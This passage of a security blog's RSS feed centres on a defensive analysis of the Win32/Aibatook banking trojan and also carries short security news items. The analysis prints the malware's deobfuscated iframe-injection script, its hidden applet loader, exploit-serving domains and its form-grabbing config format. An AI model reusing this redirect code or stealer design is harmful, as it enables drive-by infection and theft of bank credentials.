In the above example, the Aibatook malware has silently injected a false login page as a user visits the Japan Post bank, requesting that they fill in their personal details because of a system upgrade.

Stolen data is then sent to the criminals via a C&C (Comamnd and Control) server.

Craftily, if the user visits a page on the Japan Post website designed to warn customers of the dangers of phishing attacks they are redirected back to the login page before they have a chance to see any security advice.

In recent months, those responsible for the Aibatook attack have created new versions of the malware, capable of stealing credentials from users of web-hosting services and domain resellers, and switching from Delphi to C++ as their programming language of choice.

In all, customers of over 90 websites are thought to be being targeted by the information-stealing criminals.

Java vulnerability to blame

The Java vulnerability exploited by the attacks was patched by Oracle back in June 2013.

In an ideal world you would hope that because a fix was available for the vulnerability, no one would have still been falling foul of the attack in the months since. However, it’s clear that many computer users are not protecting their computers with the latest security patches – giving online criminals a larger window of opportunity to infect PCs and steal money from online accounts than they could hope for in their wildest dreams.

The simple truth is that when computer users fail to keep their systems updated with security patches they are exposing themselves to greater risk, and making life easier for malicious hackers.

Computer users should also consider carefully what other steps they are taking to minimise the attack surface.

Just about every piece of software you run on your computer has vulnerabilities – whether they be known or unknown. Most, hopefully, are not serious and cannot be easily exploited by hackers.

But every additional piece of code or functionality that you enable on a PC increases the potential risk. A smaller attack surface makes the exploitation of vulnerabilities more difficult, and so will help mitigate risk.

With that in mind, all computer users should ask themselves: Do I need to run Java in my web browser?

Coffee cupJava is probably the most targeted development platform for exploit attacks, and some reports have suggested that a gob-smacking 50% of all exploits target Java.

Over the last few years, it has become increasingly common to find cybercriminal gangs exploiting Java vulnerabilities – as it is so commonly installed, and has a poor history when it comes to security holes.

As a result, and you might have guessed this, Java is not my favourite cup of tea.

Although it’s true that there are some specific applications that need Java, my suspicion is that most computer users could get by just fine without having it enabled in their browser. Even if they do need it for one or two specific sites or applications, it might be better – from the security point of view – to disable Java in the browser and use a *different* browser when you need to access those sites.

If you’re not sure if you need Java enabled, ask your IT support desk or turn it off on your home computer and see if anything stops working. If you don’t notice any difference in your day-to-day browsing of the web, chances are that you never needed it turned on at all.

Congratulations – you’ve just made your computer a whole lot safer.

Not that I’m recommending, of course, that you now visit Japanese porn websites…

The post Hacked Japanese porn sites spread banking malware attack appeared first on We Live Security.

]]>
http://www.welivesecurity.com/2014/07/16/hacked-japanese-porn-sites/feed/ 1
Win32/Aibatook: Banking Trojan Spreading Through Japanese Adult Websites http://www.welivesecurity.com/2014/07/16/win32aibatook/ http://www.welivesecurity.com/2014/07/16/win32aibatook/#comments Wed, 16 Jul 2014 11:41:29 +0000 Win32/Aibatook: Banking Trojan Spreading Through Japanese Adult Websites http://www.welivesecurity.com/?p=47775 Win32/Aibatook targets Japanese bank customers with an unusual Internet Explorer monitoring technique. We believe the malware has been in development for months - and is now ready for take-off.

The post Win32/Aibatook: Banking Trojan Spreading Through Japanese Adult Websites appeared first on We Live Security.

]]>
Introduction

This blog post will explore a malware family named Win32/Aibatook, which targets Japanese users’ banking information and hosting providers’ account credentials. It appeared at the end of 2013 and a previous version has already been documented by Symantec, which has even sinkholed some of Win32/Aibatook’s C&C servers. Far from being discouraged, the operators have since published an updated version and moved from Delphi to C++ as their programming language. This post will focus on this new strain, which came out in April 2014 and has some interesting quirks:

  • Propagation of the malware is made through a custom exploitation chain placed on compromised websites
  • It only targets Internet Explorer, using an unusual technique to steal personal information
  • Two different implementations of the information-stealing logic are deployed; the first one is specifically tailored against two major Japanese banks, whereas the second one is more flexible and currently used to target around 90 Japanese websites

We will first describe the most recent propagation method of Win32/Aibatook, and then its actual functionalities and their implementation

Propagation

The Win32/Aibatook bank fraud malware’s story starts, as usual nowadays, with legitimate websites that have been compromised to redirect their visitors to exploit-serving machines in order to infect them with malicious software. But rather than using a full-fledged exploit kit – such as Fiesta, Angler or any other of the usual suspects, which are able to serve different exploits depending on the visitor’s configuration – the miscreants behind Win32/Aibatook infections employ only one exploit at a time. While it could appear to be a non-optimal strategy, it is actually coherent with the targeted nature of this whole operation. If you possess an efficient exploit against your target – Japanese bank customers in this case – why would you bother using more?

Since mid-April, the exploit used to propagate Win32/Aibatook uses the Java vulnerability CVE-2013-2465. In order to do so, several compromised legitimate websites have been used. Over the last three months, we identified four of these websites (and we believe there are more) – these domain names are listed below:

sokuhabo.net
www.uravidata.com
ppv.xxxurabi.com
mywife.cc

These four websites provide pornographic content aimed at a Japanese audience. According to Alexa, three of them belong to the 20,000 most visited websites from Japan; “mywife.cc” is even part of the first 2,000. It remains unclear how the attackers compromised these websites.

The image below describes the exploitation process in the particular case of “ppv.xxxurabi.com” (the others three websites follow similar exploitation logic):

1_aibatook_exploit_NEW-edit copy
1. The user browses to a webpage on “ppv.xxxurabi.com“, which includes a link to a malicious JavaScript (JS) file hosted on “google.sonovi.com“, another compromised website.

2. Once a first layer of basic obfuscation has been removed, this script has the following form:

if(document.cookie.indexOf(“GOOGLE1″)==-1)
{    

var _d=new Date();
_d.setTime(_d.getTime()+24*60*60*1000);

document.cookie=”GOOGLE1=123GOOGLE1456;expires=”+_d.toGMTString();

setTimeout(
       

function(){
var _ifr=document.createElement(/ifra/.source+/me/.source);

ifr.width=”1″;

ifr.height=”1″;

ifr.frameborder=”0″;

ifr.src=”//2002.jp/”;

document.body.appendChild(_ifr)},

1000)

}

The script injects an IFRAME to an exploit-serving webpage “2002.jp”. It also sets a Cookie named “GOOGLE1” that will stay on the user’s computer during the next 24 hours, such that no additional redirects occur during this time-frame.

3. Then the user connects to the exploit-serving website, which replies with what looks like an error page:

Banking malware aibatook 1 Under certain conditions a snippet of HTML code – invisible to the user — will be inserted at the very beginning of the page. It is highlighted in blue in the following page source below:

<HTML>
<BODY>
<applet id=”HelloApplet” code=”b399.class”,height=”0″ width=”0″></applet>
</BODY>
</HTML><script src=”//ccc.rejec.net/counter.php”></script>
<html>
<head>
<title>Error 404 Not Found</title>

The browser will then download the Java applet “b399.class” from the website and execute it. It will also request a file named “counter.php” on another domain. We believe this last step is related to the conditions under which the HTML snippet will be inserted: only a limited number of users per day will receive the exploit, explaining the need to count the number of tries. This counter script is hosted on what appears to be yet another compromised website, “ccc.rejec.net”.

4. The Java applet is an exploit for the vulnerability CVE-2013-2465. Roughly summarized, it starts with an integer overflow in a 2D component of Java SE that leads to a memory corruption in the Abstract Window Toolkit (AWT) code. This memory corruption allows the bypass of the Java sandbox through the rewrite of the “SecurityManager” class. The exploit will then download the payload from the URL provided by one of the class files, save it as “tar.gif”, and finally execute it. The payload URL was “xsvx1014274.xsvr.jp” during our investigation.

The various class files that we observed as part of this exploit are described below:

SHA-1 Hash File Name Purpose
56ba51304da919b71833520dece8ca3c644011d3 49b0699acf7682084b4cde88a3af6d1c1b7c0c09 b399.class Manages the exploitation
2ca6c1a0cf118ff7beb14453da4875b59d8084e0 a1bd.class Defines malicious AWT subclass
9f9627dae3adfeac8ecbd8698fc0f5da22f79d70 Af.class Returns the URL of the file to download
8fb90f496367112049eb8dafb518b98945b0b9ec HttpGet.class Fetches a file at a given URL and executes it

We would like to stress the fact that Win32/Aibatook was distributed through other exploits at different periods of time (e.g. CVE-2014-0322), but always in this “one exploit at a time” configuration according to our observations.

Payload

Win32/Aibatook’s main objective is to steal personal and banking information from Japanese users. This comes in two different flavors: firstly, a few banks are targeted in a tailored manner, and secondly, around 90 different websites are targeted through a more generic method. Both these methods rely on the same Internet Explorer manipulation technique, which we are now going to describe.

Internet Explorer Manipulation

Win32/Aibatook controls Internet Explorer through the COM interface “IHTMLDocument2”, which allows easy reading and writing of webpages with high-level methods. To retrieve this interface for the currently browsed webpage, Win32/Aibatook performs the following steps:

  • Retrieve a handle on the window under the mouse cursor using “GetCursorPos” and “WindowFromPoint” API functions
  • Check whether that window’s class name is “Internet Explorer_Server”:
    • If it is not, the program simply sleeps for one second before retrying
    • If it is, the “IHTMLDocument2” interface is instantiated from the window’s handle, using a documented technique

Such Internet Explorer-specific implementations – which work from versions 8 to 11 at least – can seem pretty limited, because no other browsers can be manipulated. However, Japan is one of the few countries where Internet Explorer is the most-used browser. This is another indicator of Win32/Aibatook’s Japanese-only focus.

The next two sections present the attacks used by Win32/Aibatook, respectively denoted “Tailored Information Stealer” and “Generic Information Stealer”.

Tailored Information Stealer

In the first application of the Internet Explorer monitoring technique, Win32/Aibatook targets a few banks whose URLs are hardcoded into the program. During our investigation, we observed Japan Post and the SBI Sumishin Net Bank as targets. In order to attack these banks, Win32/Aibatook extracts the URL of the currently visited webpage, using the “IHTMLDocument2.get_url” method, and compares it with the targeted banks’ URLs:

aibatook


 It should be noted that the banks’ URLs are encrypted with a custom cipher, as are all the malicious strings present in Win32/Aibatook samples. More precisely, each encrypted string is composed of two parts:

  • The first one is a fixed-length key that looks like a base64 encoded string, but that is actually just random base64 characters. Before being used, this key will be XOR-ed with a hardcoded value.
  • The second part contains the encrypted data that will be base64 decoded first, and then XOR-ed with the previous key.

In case it is one of the targeted banks’ URLs, the malicious program will monitor the user login process based on the title of the page (“IHTMLDocument2.get_title”) and its content (“IHTMLDocument2.get_nameProp”). During this login process, Win32/Aibatook can do two things:

  1. Retrieve values entered by the user in certain HTML input fields (login, password, and so forth.)
  2. Rewrite HTML code displayed to the user by requesting the body of the HTML page (“IHTMLDocument2.get_body”) and modifying it (“body.put_innerHTML”). Here is an example of HTML code injected into the Japan Post bank login page:

Banking malware aibatook 4The red message roughly translates as an urgent request for the user to type in their personal identification number, because a system upgrade is necessary (clicking on the button just redirects to another page on the Japan Post website). Once personal information has been gathered, the program sends it to the C&C server using a hardcoded URL. This message is a HTTP POST request containing the grabbed information as parameters, encrypted in a similar manner as the strings previously mentioned. It also sends the MAC address of the machine, probably to identify the victim. Among the two targeted banks with this method, Japan Post – targeted by Win32/Aibatook since the beginning – receives special treatment:

  • A malicious proxy is set in the web browser when the user visits the Japan Post website. We were unable to observe the usage of this proxy, but we can guess it is another way to collect the information entered by the user.
  • If the user visits an anti-phishing webpage on the Japan Post website, Win32/Aibatook redirects to the login page before the anti-phishing webpage can be loaded.

Generic Information Stealer

Last April, an additional information-stealing technique appeared in Win32/Aibatook. It allows attackers to extend the number of targets greatly without too much effort, even targeting non-banking websites. During the last few months this technique has been refined and seems recently to have reached a satisfying level – at least from the Win32/Aibatook authors’ point-of-view – as they are now only modifying the content and not the capabilities of the configuration engine.

This technique, commonly named ‘form-grabbing’, consists of constantly monitoring HTML input fields in webpages browsed by the user. In case these input fields match certain conditions, their filled values will then be exfiltrated. In order to so, a configuration file describing the target websites is fetched from a hardcoded URL. This file is initially encrypted in a similar manner to the strings described before, and will then be stored in memory in plain-text form. Here is an excerpt of one particular configuration file we found:

[VER]1000[/VER]
[W]

[Web]xy40[/Web]
[CURL]REDACTED.jp[/CURL]
[CTI][/CTI]

[NAME]memberid[/NAME]

[NAME]password[/NAME]

[NAME]domain[/NAME]

[/W]
[W]

[/W]

It’s a structured file with hierarchical tags similar to HTML language, except that tags are enclosed in brackets. It starts with a version tag, followed by a series of “[W]” entries, each of them representing a target and containing multiple sub-entries:

  • [Web]” tag contains the target’s name, which is usually set to some kind of code name with no apparent meaning
  • [CURL]” tag contains the target webpage’s URL (target’s URL has been removed from the previous image)
  • [CTI]” tag contains the target webpage’s title
  • [NAME]” tag defines an HTML input field’s name that will be leaked
  • [ID]” tag defines an HTML input field’s ID that will be leaked

The logic followed by the program with this configuration file is the following: if a website’s URL matches the “[CURL]” tag value of one entry, or its title matches the “[CTI]” value tag, then each HTML input field that matches either “[NAME]” or “[ID]” tag values will be exfiltrated. To make it clear, let’s take a look at an artificial example:

Win32/Aibatook configuration Page visited by the user at the URL http://my_bank.demo/login/ step2.html Exfiltrated data when the user has filled the input fields with the values “MY_NAME” and “SECRET_PASSWORD

[W] 

[Web] CONFIG_DEMO [/Web] [CURL][/CURL] [CTI][/CTI] [NAME] user_name [/NAME] [ID] user_password [/ID]

[/W]

<html> <title>STEP 2</title> <form> User name: <input type=”text” name=”user_name”> Password: <input type=”text” id=”user_password”> </form> </html> [WEB]CONFIG_DEMO[/WEB] [TITLE]STEP 2[/TITLE] [URL]http://my_bank.demo/ login/step2.html[/URL] [NAME=user_name]MY_NAME [/NAME] [ID=user_password] SECRET_PASSWORD[/ID]

In this example we have, from left to right, a Win32/Aibatook’s configuration file with one entry, then a visited webpage that will trigger this entry, and finally the information sent to the exfiltration server. This information-stealing technique is highly flexible; in particular some entries come with empty values for “[CURL]” and “[CTI]” tags, making any webpage with the corresponding HTML input fields a match. In terms of targets, we found 87 of them during our investigation. We were able to identify some of them, based on the “[CURL]” and “[CTI]” tags values, whereas the others remain unidentified. The domains of activity of these targets are described below:

Domains of activity Number of targets
Bank 23
Hosting Provider 5
Domain reseller 1
Unidentified 58

As expected, the majority of the identified targets belong to the banking domain, but some of them are hosting companies, which could explain how legitimate websites are compromised and then used in the exploitation chain. It should be noted that the majority of the identified targets are important businesses in Japan.

Conclusion

In this blog post we have described Win32/Aibatook, a malware family targeting Japanese users. Computers become infected by this malware through a custom exploitation chain served by compromised legitimate websites. Its main purpose is to steal personal information through an unusual Internet Explorer monitoring technique. This technique implements two different information stealers, one specifically tailored against a few major Japanese banks, and a second one targeting around 90 different websites.

Based on our observations during this investigation, Win32/Aibatook has been constantly developed over the past few months. We believe that this malware family is now ready for take-off, and we expect its authors to spread it more broadly in the near future.

This analysis was created by Clément Rouault, in collaboration with Joan Calvet.

Hashes

Here are some SHA-1 hashes of Win32/Aibatook samples:

c5ffed550addfa27dc1adbc58f3f99fa9a5bc9e8
ebd4fd477bd8a93bfb24fd49128860e8d2b494e0
3e90dde02423687b7c81cba8fc600f7cbcda8752
4343919ba7c2701f5481632f20bf7ddc2c6ebe11

The post Win32/Aibatook: Banking Trojan Spreading Through Japanese Adult Websites appeared first on We Live Security.

]]>
http://www.welivesecurity.com/2014/07/16/win32aibatook/feed/ 0
Artist mails NSA ‘uncrackable’ mixtape http://www.welivesecurity.com/2014/07/16/encryption-tools/ http://www.welivesecurity.com/2014/07/16/encryption-tools/#comments Wed, 16 Jul 2014 11:37:41 +0000 Artist mails NSA ‘uncrackable’ mixtape http://www.welivesecurity.com/?p=48008 An artist has created what he claims to be an ‘uncrackable’ mixtape, using freely available encryption tools and housed on a home-made device, and posted it to America’s National Security Agency (NSA).

The post Artist mails NSA ‘uncrackable’ mixtape appeared first on We Live Security.

]]>
An artist has created what he claims to be an ‘uncrackable’ mixtape, using freely available encryption tools and housed on a home-made device, and posted it to America’s National Security Agency (NSA).

Neowin reports that the move is an attempt to voice disquiet over the NSA’s surveillance of electronic communication – and to highlight the importance of encryption tools.

Artist David Huerta describes how the mixtape is secured using freely available encryption tools via a post on Medium – and explains that the tracklisting has only ever been shared on paper, rather than digitally.

The ‘tape’ – actually a bespoke device created using an Arduino microcontroller board – is purposely recorded at low quality to mimic what Huerta imagines to be the low-quality of intercepted phone calls.

Encryption tools create ‘blind spot’

Vice reports that the device is meant to highlight the fact that while government organizations can compromise computer systems and devices, “the actual cryptography connecting those systems was still something it fundamentally can’t break.”

ESET Senior Security Researcher Stephen Cobb says in a blog post explaining the importance of encryption to business, “Encryption of files, whether stored on a drive or emailed via Outlook, not only gets you Safe Harbor when something does go astray, it also buys you considerable peace of mind.”

“The device contains a soundtrack for the modern surveillance state. It’s designed to be enjoyed only by people I have consented it to be listened to,” Huerta says.

Private key

Huerta kept one copy of the ‘tape’ and mailed the other to the NSA’s Maryland headquarters - minus the public key required to decrypt it. Huerta wants his tape to be “a reminder” of the power of encryption.

“Encryption is the blind spot to the NSA’s all-seeing eye. Math doesn’t need an information dominance center to enforce its rules. Math is the legal framework which the universe can only obey and will trump and outlast the rules of any human state,” he writes.

“For the common person to have access to encryption was the result of several Promethean acts of defiance against the military powers that wanted to make cryptography only available to themselves to weaponize.”

The post Artist mails NSA ‘uncrackable’ mixtape appeared first on We Live Security.

]]>
http://www.welivesecurity.com/2014/07/16/encryption-tools/feed/ 0
CNET ‘database leak’ – are your details safe? http://www.welivesecurity.com/2014/07/16/cnet-database-leak/ http://www.welivesecurity.com/2014/07/16/cnet-database-leak/#comments Wed, 16 Jul 2014 11:21:06 +0000 CNET ‘database leak’ – are your details safe? http://www.welivesecurity.com/?p=47990 Popular technology news and review website CNET faced the threat of having a million users' data exposed this week, with an unknown attacker posting screenshots of data from a CNET server, and demanding a surprisingly small ransom…

The post CNET ‘database leak’ – are your details safe? appeared first on We Live Security.

]]>
Popular technology news and review website CNET faced the threat of having a million users’ data exposed this week, with an unknown attacker posting screenshots of data from a CNET server, and demanding a surprisingly small ransom – one Bitcoin.

A Twitter user naming himself “worm” contacted the site, according to CNET’s Seth Rosenblatt, and said that his group, identified by CNET as Russian hackers, had access to a database of registered user data.

Direct messages sent to CNET claimed that the database leak included email addresses, names and encrypted passwords. An image posted to the site, and shown by Forbes, indicated that the persons responsible could access files on the server.

Database leak – ‘users safe for now’

“Worm” avoided giving details of the exploit in his communication with the site – which Beta News suggests should be reassuring to CNET users. Neither the database details nor the means of getting to them have been leaked thus far.

Beta News quotes Worm’s response as “But I principled that something would not sell it if rasprostronenie [distribute] source code — a step to improve safety. SNET [sic] sale bd for me crime, information about the sale move to the aggravation of the situation around hacking”.

Security news reports on the incident have offered several explanations for how Worm could have accessed the data. The Twitter messages suggested that the same group had been behind attacks on high-profile targets such as Bank of America, Adobe and the BBC, according to the BBC’s report.

Group ‘behind high-profile attacks’

The person or group claimed that the demand for one Bitcoin (valued at $622, via xe.com) was merely designed to increase security news publicity for the database leak. The BBC reports that the group said, via direct message, “[W]e are driven to make the Internet a better and safer [place] rather than a desire to protect copyright.”

Forbes reports that Jenn Boscacci, senior manager of corporate communications at CNET, said, ““Here’s the situation, a few servers were accessed.  We identified the issue and resolved it yesterday. We will continue to monitor.”

The post CNET ‘database leak’ – are your details safe? appeared first on We Live Security.

]]>
http://www.welivesecurity.com/2014/07/16/cnet-database-leak/feed/ 0
Data breaches in New York have tripled http://www.welivesecurity.com/2014/07/15/data-breaches/ http://www.welivesecurity.com/2014/07/15/data-breaches/#comments Tue, 15 Jul 2014 09:40:14 +0000 Data breaches in New York have tripled http://www.welivesecurity.com/?p=47900 Data breaches have hit a record high in the state of New York, tripling since 2006, according to records released by the state attorney general.

The post Data breaches in New York have tripled appeared first on We Live Security.

]]>
Data breaches have hit a record high in the state of New York, with 900 breaches affecting 7.3 million people in 2013, according to records released by the state attorney general.

The New York Times notes that the rise in serious data breaches was driven by criminal attacks, with computer hackers “by far” the leading cause of data breaches, responsible for 40% of unauthorized data access in 2013.

Bloomberg’s Businessweek calculates that data breaches have tripled in the period 2006-2014, with “mega breaches” such as the Target data breach partially responsible.

Since 2005, New York law has required companies to notify the attorney general whenever a data breach has exposed private data such as social security numbers, driver’s license details, names and account numbers, according to the Westfield Republican.

Data breaches – hacking now biggest threat

“What’s truly shocking about this report, beyond the fact that hacking is now the greatest threat to our personal information and costs us billions of dollars, is that many of these breaches could have been prevented,” New York’’s attorney general, Eric T Schneiderman said in a statement.

Bloomberg News said that since 2006, New Yorkers had experienced 5,000 data breaches, exposing the records of 22.8 milllion New Yorkers in total.

‘Collaborative approach’ to data breaches

Apart from criminal attacks, the remainder of breaches suffered by New Yorkers were caused by loss or sale of equipment, employee errors, and insider attacks, according to Associated Press.

Schneiderman said, “Our expansive look at data breaches found that millions of New Yorkers have been exposed without their knowledge or consent.”

The attorney general said that his office would take a “collaborative approach to address the complex problems surrounding data security.” Bloomberg reports that Schneiderman said that “engaging industry stakeholders and security experts, as well as lawmakers” could offer new tools for protecting New Yorkers’ private information from data breaches.

The post Data breaches in New York have tripled appeared first on We Live Security.

]]>
http://www.welivesecurity.com/2014/07/15/data-breaches/feed/ 0
Google Chrome security warnings – now in plain English http://www.welivesecurity.com/2014/07/15/google-chrome-security/ http://www.welivesecurity.com/2014/07/15/google-chrome-security/#comments Tue, 15 Jul 2014 09:20:55 +0000 Google Chrome security warnings – now in plain English http://www.welivesecurity.com/?p=47883 “Phishing attack ahead” is similar to the stark, clear warnings delivered by road signs - and web users will soon benefit from this sort of plain-speaking alert, at least when using Google’s Chrome browser.

The post Google Chrome security warnings – now in plain English appeared first on We Live Security.

]]>
“Phishing attack ahead” is similar to the stark, clear warnings delivered by road signs – and web users will soon benefit from this sort of plain-speaking alert, thanks to an upcoming change to Google Chrome security warnings.

Google’s Safe Browsing service is testing new malware warnings delivered as part of Google Chrome security – far simpler, and blunter than previous alerts.

According to ZDNet’s report, previously users about to stumble on a phishing website would be warned, “Reported phishing website ahead, Google Chrome has blocked access to [url]. The website has been reported as a phishing website.”

The new warning will be, “Attackers on [url] might try to trick you to steal your information, for instance, passwords, messages or credit cards.”

Google Chrome security overhaul

The new Google Chrome security warnings come on a simple red page – and the previous cartoon of a burglar attempting to reach out and access a computer keyboard has gone – according to Tech World’s report.

Similar changes are being tested with Safe Browsing’s malware warnings, which now warn, bluntly, “The site ahead contains malware.”

The option to avoid the potentially infected page after a Google Chrome security warning is now a clear “back to safety,” according to Tech World.

Commenters on the official Google post have praised the clarity of the new Google Chrome security warnings – and the fact that the language makes clear that the attack has not happened yet.

Warning fatigue

The change comes in the wake of a Berkeley research paper, commissioned by Google, which found that users ignored many browser warnings.

Browser security warnings do work to protect users from phishing and malware sites – but “warning fatigue” means important alerts over site security can be completely ignored.

Users of Google’s Chrome ignored SSL warnings (relating to a secure protocol used for passwords, internet transactions, and banking) 70.2% of the time, a study of 25 million real-life warnings found. Overall, a study using metrics Firefox and Chrome found that  the effectiveness of warnings varies widely from warning to warning and from browser to browser.

“Google Chrome’s SSL warning had a click-through rate of 70.2%. Such a high click-through rate is undesirable: either users are not heeding valid warnings, or the browser is annoying users with invalid warnings and possibly causing warning fatigue,” said the U.C. Berkeley researchers. The study, Alice in Warningland, was part-funded by Google.

“During our field study, users continued through a tenth of Mozilla Firefox’s malware and phishing warnings, a quarter of Google Chrome’s malware and phishing warnings, and a third of Mozilla Firefox’s SSL warnings,” the researchers said.

The researchers analysed the size, type and frequency of warning messages and found that users tended to click rapidly through warnings about “untrusted issuers” and name and date errors – both common warnings, and ignored by nearly half of users.

The researchers say that “warning fatigue” has significant impact – “users click through more-frequent errors more quickly,” they say.

The researchers concluded that previous studies – showing that browser warnings simply did not work – relied on outdated data, harvested in a period between 2002 and 2009 when browsers were rapidly evolving. In particular, the large phishing warnings now delivered by modern browsers were much more effective than previous, more discreet warnings.

The post Google Chrome security warnings – now in plain English appeared first on We Live Security.

]]>
http://www.welivesecurity.com/2014/07/15/google-chrome-security/feed/ 0
How to protect your small business from cybercrime http://www.welivesecurity.com/videos/protect-small-business-cybercrime/ http://www.welivesecurity.com/videos/protect-small-business-cybercrime/#comments Tue, 15 Jul 2014 08:58:23 +0000 How to protect your small business from cybercrime http://www.welivesecurity.com/?post_type=post_video&p=47909 Internet security may not be at the top of your priority list when starting a new business, but ignoring the dangers may be costly. Follow these 5 simple tips from We Live Security to avoid any potential threats.

The post How to protect your small business from cybercrime appeared first on We Live Security.

]]>
Internet security may not be at the top of your priority list when starting a new business, but ignoring the dangers may be costly. Follow these 5 simple tips from We Live Security to avoid any potential threats.

The post How to protect your small business from cybercrime appeared first on We Live Security.

]]>
http://www.welivesecurity.com/videos/protect-small-business-cybercrime/feed/ 0
“I’ve been hacked, and now I’m pregnant!” http://www.welivesecurity.com/2014/07/14/hacked-pregnant/ http://www.welivesecurity.com/2014/07/14/hacked-pregnant/#comments Mon, 14 Jul 2014 15:59:40 +0000 “I’ve been hacked, and now I’m pregnant!” http://www.welivesecurity.com/?p=47847 An embedded microchip that stops you from becoming pregnant? Would you trust it to protect itself properly from a hacker attack?

The post “I’ve been hacked, and now I’m pregnant!” appeared first on We Live Security.

]]>
We put trust in technology every day.

We drive a car to work, and trust that its brakes won’t fail too badly, and that its engine won’t explode in a massive fireball on the dual carriageway.

We tap words into a computer, and trust that someone didn’t goof up the wiring and that we’re not going to get an electric shock.

We drink water, and trust that the computers at the water filtration plant didn’t go wacko and allow some toxic element to make its way into the taps in our houses.

It’s clear that we trust technology a lot. And with some very important things.

So, it’s interesting that some things that technology can help with seem to automatically send a shiver down our security spines.

Take MicroCHIPs, for instance. They’re a company from Lexington, Massachusetts, whose tagline is “programmable drug delivery” and describe claim to specialise in “intelligent implanted devices designed to improve the health of millions of people”.

According to CNET, MicroCHIPs has developed a tiny chip that can be implanted under a woman’s skin to manage her birth control for up to 16 years.

The chip, which measures just 20 x 20 x 7 millimetres, contains tiny reservoirs – filled with birth control drugs.

MicroCHIPs’ technology is based on proprietary reservoir arrays that are used to store and protect potent drugs within the body for long periods of time. These arrays are designed for compatibility with preprogrammed microprocessors, wireless telemetry, or sensor feedback loops to provide active control. Individual device reservoirs can be opened on demand or on a predetermined schedule to precisely control drug release or sensor activation.

Sounds clever doesn’t it?

And, guess what? You can control the chip wirelessly via a remote control.

So, you had better hope that someone malicious can’t subvert the security in the chip’s wireless communications.

After all, if they are able to control the drug’s release on demand they could potentially either stop the contraception entirely (increasing the chances of pregnancy) or flood the woman’s body with massively higher levels of the drug that could cause illness.

MChips graphic

So, would you trust the technology to manage your or your wife’s fertility? Or would you be concerned about (ahem) unauthorised penetration?

It’s not as though security researchers and hackers haven’t shown they can take control of how much insulin is pumped through a patient’s body, or that a former vice-president of the United States wasn’t so frightened of assassination that he had the wireless feature of his implanted heart defibrillator deactivated.

In an interview with Mashable, Robert Farra of MicroCHIPS attempts to reassure the public that the devices are being made with security in mind:

A hacker would have to contact the patient’s skin to reach the device, and all and the commands are sent by radio frequency rather than by Bluetooth. The short range also makes it impossible for a hacker to “listen in,” The short range also makes it impossible for a hacker to “listen in,” Farra says.

The chip has a micro-clock that remembers when the last 30-day reservoir was opened. Even if that failed, the chip’s battery is not strong enough to melt all the seals at once and release the all the reservoirs at the same time.

Farra also says chips will not break in an accident and release drugs because they are strong enough to resist hundreds of pounds of pressure per square inch. They will be implanted in soft parts of the body that offer cushioning, he adds.

Car manufacturers spend millions ensuring that their vehicles are safe to drive, as they know that they would be hit by huge consequences if they had an endemic safety problem. Similarly, there are bodies who keep a close eye on our utility systems to make sure that they are not poisoning us, and hoops that manufacturers must jump through before they can put electrical devices onto the market.

Let us all hope that medical device manufacturers are taking their responsibility to our safety seriously, and teaming up with cybersecurity experts to ensure that their wireless devices are protected from malicious hackers.

Time will tell if MicroCHIPs safety measures will have been sufficient or not. If they’re not, what’s the betting that someone will drily condemn their offspring with a telling name.

Chip, perhaps?

The post “I’ve been hacked, and now I’m pregnant!” appeared first on We Live Security.

]]>
http://www.welivesecurity.com/2014/07/14/hacked-pregnant/feed/ 7
Android L Security http://www.welivesecurity.com/podcasts/android-l-security/ http://www.welivesecurity.com/podcasts/android-l-security/#comments Mon, 14 Jul 2014 15:10:17 +0000 Android L Security http://www.welivesecurity.com/?post_type=post_podcast&p=47857 The post Android L Security appeared first on We Live Security.

]]>
The post Android L Security appeared first on We Live Security.

]]>
http://www.welivesecurity.com/podcasts/android-l-security/feed/ 0
Keylogger malware in hotel business centers – should you worry? http://www.welivesecurity.com/2014/07/14/keylogger-malware/ http://www.welivesecurity.com/2014/07/14/keylogger-malware/#comments Mon, 14 Jul 2014 14:41:06 +0000 Keylogger malware in hotel business centers – should you worry? http://www.welivesecurity.com/?p=47837 Guests who used business centers in American hotels may be at risk from gangs installing keylogger malware on the computers to steal banking and email passwords.

The post Keylogger malware in hotel business centers – should you worry? appeared first on We Live Security.

]]>
Guests who used business centers in American hotels may be at risk from gangs installing keylogger malware on the computers to steal banking and email passwords, according to a report by veteran security writer Brian Krebs.

The Department of Homeland Security and National Cybersecurity and Communications Integration Center (NCCIC) issued an advisory to hotel companies on July 10, warning that criminal groups may be targeting hotel business centers with keylogger malware, according to Help Net Security.

“In some cases, the suspects used stolen credit cards to register as guests of the hotels; the actors would then access publicly available computers in the hotel business center, log into their Gmail accounts and execute malicious key logging software,” the NCCIC said in its advisory.

Keylogger malware warning

Despite describing the attacks as “not sophisticated”, the attackers’ keylogger malware had a high impact, the NCCIC warns: “The suspects were able to obtain large amounts of information including other guests personally identifiable information (PII), log in credentials to bank, retirement and personal webmail accounts, as well as other sensitive data flowing through the business center’s computers.”

The warning follows the arrest of suspects in Texas who had used keylogger malware to record the keystrokes of guests, and had successfully stolen details such as bank account passwords and email login credentials at several “major” hotel chains.

How to stay safe from keylogger malware

The advisory included steps for hotel chains to secure PCs in their business centers – including limiting guests to non-administrator accounts without the ability to install programs.

Help Net Security points out that much modern malware can install regardless of whether a user has administrator privileges – and advises hotel guests to refrain from entering sensitive information such as banking passwords whilst on PCs in hotel business centers.

Krebs points out that the fact that hotel business centers routinely allow users to plug in USB devices and CDs means that attackers can bypass many security measures.

Security Affairs offers a detailed list of the NCCIC’s recommendations for hotel chains – but concludes that the simplest solution is to avoid using any public computer for private affairs such as banking, warning “Cybercriminals are behind you.”

The post Keylogger malware in hotel business centers – should you worry? appeared first on We Live Security.

]]>
http://www.welivesecurity.com/2014/07/14/keylogger-malware/feed/ 0
Retina scanner for Samsung Galaxy Note 4? http://www.welivesecurity.com/2014/07/14/samsung-galaxy-note-4/ http://www.welivesecurity.com/2014/07/14/samsung-galaxy-note-4/#comments Mon, 14 Jul 2014 13:52:58 +0000 Retina scanner for Samsung Galaxy Note 4? http://www.welivesecurity.com/?p=47804 A Tweet from an official Samsung Galaxy Note 4 account has dropped a very unsubtle hint that its upcoming Galaxy Note 4 handheld may feature a retina scanner - offering a significantly higher level of password security.

The post Retina scanner for Samsung Galaxy Note 4? appeared first on We Live Security.

]]>
A Tweet from an official Samsung Galaxy Note 4 account has dropped a very unsubtle hint that its upcoming Galaxy Note 4 handheld may be the first device from the company to feature a retina scanner – offering a significantly higher level of password security than the fingerprint scanners on Samsung’s current flagships, such as the Galaxy S5, and on Apple’s rival iPhone 5S.

